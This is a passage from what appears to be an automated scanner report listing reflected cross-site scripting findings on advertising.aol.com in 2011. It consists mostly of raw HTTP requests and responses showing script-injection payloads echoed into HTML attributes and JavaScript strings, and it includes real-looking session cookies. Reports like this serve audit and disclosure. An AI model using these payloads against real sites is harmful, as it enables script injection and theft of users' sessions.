Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bbabf"><script>alert(1)</script>320792b55e6/4/4/1/" />
...[SNIP]...

4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ecd"><script>alert(1)</script>bbbae57115 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/" />
...[SNIP]...

4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2375"-alert(1)-"00b229b1262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /e2375"-alert(1)-"00b229b1262/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2375"-alert(1)-"00b229b1262/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8368"><script>alert(1)</script>f05492a9878 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8368"><script>alert(1)</script>f05492a9878/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1111f"-alert(1)-"0965b770745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1111f"-alert(1)-"0965b770745/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1111f"-alert(1)-"0965b770745/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d8b9"-alert(1)-"6eecb609471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /3d8b9"-alert(1)-"6eecb609471/7/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3d8b9"-alert(1)-"6eecb609471/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf03"><script>alert(1)</script>3eb5e78913b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/" />
...[SNIP]...

4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bccd4"-alert(1)-"20d13911a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bccd4"-alert(1)-"20d13911a60/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bccd4"-alert(1)-"20d13911a60/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17768"><script>alert(1)</script>d9ef3f9913f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/" />
...[SNIP]...

4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67fb"><script>alert(1)</script>c3e09f6c64d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3" />
...[SNIP]...

4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88df7"-alert(1)-"dba33f7ee0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,ad
...[SNIP]...

4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a107"-alert(1)-"5790374bb49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisin
...[SNIP]...

4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40c6"><script>alert(1)</script>dfa626667ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

